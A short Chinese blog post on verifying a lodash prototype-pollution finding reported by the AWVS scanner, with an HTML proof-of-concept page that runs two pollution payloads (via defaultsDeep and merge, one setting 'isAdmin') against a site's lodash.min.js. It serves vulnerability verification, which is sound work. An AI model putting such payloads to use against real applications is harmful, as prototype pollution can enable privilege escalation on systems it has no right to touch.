AWVS中lodash如何验证

作为一名漏扫攻城狮，时不时会在AWVS中看到lodash这个漏洞，但是我只管导出报告，该怎么验证呢？

验证POC

下面就是用于验证的POC，把这个html中的src进行修改为扫描的网站中的lodash.min.js然后浏览器打开

<!DOCTYPE html>
<html>
<head>
  <title>Lodash 原型污染测试</title>
  <!-- 加载 Lodash -->
  <!-- 这里修改src中的链接 -->
  <script src="https://cdn.jsdelivr.net/npm/lodash@4.17.21/lodash.min.js"></script>
</head>
<body>
  <script>
    // 测试代码
    const payload = '{"constructor": {"prototype": {"lodash": true}}}';
    _.defaultsDeep({}, JSON.parse(payload));

    if ({}.lodash === true) {
      alert("⚠️ 漏洞存在！\n你的 Lodash 版本存在原型污染风险 (CVE-2018-3721, CVE-2019-10744)");
    } else {
      alert("✅ 安全！\n你的 Lodash 版本已修复注入漏洞");
    }
  </script>

  <script>
    // 测试代码
    const maliciousPayload = JSON.parse('{"__proto__": {"isAdmin": true}}');
    _.merge({}, maliciousPayload);

    // 检查是否污染成功
    if ({}.isAdmin === true) {
      alert("⚠️ 漏洞存在！\nObject.prototype 已被污染，isAdmin=true");
    } else {
      alert("✅ 安全！\n未检测到原型污染");
    }
  </script>
</body>
</html>

展示效果